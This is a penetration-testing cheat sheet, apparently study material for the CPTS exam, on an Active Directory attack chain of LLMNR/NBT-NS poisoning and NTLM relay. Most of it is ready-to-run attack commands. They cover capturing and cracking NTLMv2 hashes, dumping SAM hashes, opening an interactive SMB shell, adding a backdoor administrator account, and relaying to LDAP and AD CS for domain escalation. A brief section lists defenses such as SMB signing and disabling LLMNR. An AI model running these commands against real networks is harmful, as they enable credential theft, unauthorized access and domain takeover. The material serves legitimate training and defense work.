← Research Hub
Active Directory

Responder + NTLMRelayx Chain

LLMNR/NBT-NS poisoning to credential capture and relay β€” targeting machines with SMB signing disabled to achieve code execution or domain escalation.

How Poisoning Works

When a Windows machine tries to resolve a hostname that doesn't exist in DNS, it broadcasts LLMNR (Link-Local Multicast Name Resolution) and NBT-NS queries. Responder answers these with your IP, forcing the victim to authenticate to you with their NTLM credentials.

Credential Capture (Hash Only)

# Start Responder to capture NTLMv2 hashes
sudo responder -I eth0 -wfv
# -w = WPAD proxy server, -f = fingerprinting, -v = verbose

# Wait for authentication attempts β€” hashes saved to:
# /usr/share/responder/logs/SMB-NTLMv2-*.txt

# Crack with hashcat
hashcat -m 5600 ntlmv2.txt /usr/share/wordlists/rockyou.txt

# Example hash format:
# Administrator::CORP:aabbccddeeff0011:ABC123...:0101000...

NTLM Relay Attack

Instead of cracking, relay the hash directly to another machine. Requires: SMB signing disabled on the target (not the DC β€” DCs always have signing enabled).

# Step 1: Disable SMB in Responder (we relay, not capture)
sudo nano /etc/responder/Responder.conf
# Set: SMB = Off, HTTP = Off

# Step 2: Find relay targets (machines without SMB signing)
nxc smb 10.10.10.0/24 --gen-relay-list targets.txt

# Step 3: Start ntlmrelayx targeting those machines
impacket-ntlmrelayx -tf targets.txt -smb2support

# Step 4: Start Responder
sudo responder -I eth0 -wfv

# When a victim authenticates β†’ ntlmrelayx relays to targets.txt
# Default action: dumps SAM database of target if admin relay successful

Relay Target Discovery

# Find targets without SMB signing (relay candidates)
nxc smb 10.10.10.0/24 --gen-relay-list unsigned.txt
nmap --script smb-security-mode -p 445 10.10.10.0/24 | grep -E "message_signing|disabled"

Domain Escalation via Relay

# Option 1: Get NTLM hashes from SAM (local accounts)
impacket-ntlmrelayx -tf targets.txt -smb2support
# Output: hashes for local admin accounts

# Option 2: Interactive SMB shell on relay target
impacket-ntlmrelayx -tf targets.txt -smb2support -i
# Spawns interactive SMB shell on 127.0.0.1:11000
nc 127.0.0.1 11000

# Option 3: Execute command on relay target
impacket-ntlmrelayx -tf targets.txt -smb2support -c "net user hacker Pass123! /add && net localgroup administrators hacker /add"

# Option 4: Relay to LDAP for shadow credentials / RBCD
impacket-ntlmrelayx -t ldap://DC_IP -smb2support --shadow-credentials --shadow-target 'TARGET$'

# Option 5: Relay to AD CS (ESC8)
impacket-ntlmrelayx -t http://CA_IP/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
Important: You cannot relay a hash back to the machine it came from (same-host relay). You need at least 2 machines β€” victim authenticates to you, you relay to a different machine.

Defense & Exam Tips

  • Enable SMB signing on all machines to block relay (DCs do this by default)
  • Disable LLMNR via GPO: Computer Config β†’ Admin Templates β†’ Network β†’ DNS Client β†’ Turn off multicast
  • For CPTS exam: this attack works best in the initial foothold phase on internal networks
  • Combine with PetitPotam or PrinterBug to force DC authentication rather than waiting for organic traffic
  • Check if Responder is already running before starting: ps aux | grep responder
// CONTENTS
How Poisoning Works Credential Capture (Hash) NTLM Relay Attack Relay Target Discovery Domain Escalation via Relay Defense & Exam Tips
← Potato Attacks Comparison AMSI Bypass Techniques (2026) β†’ ↩ Back to Hub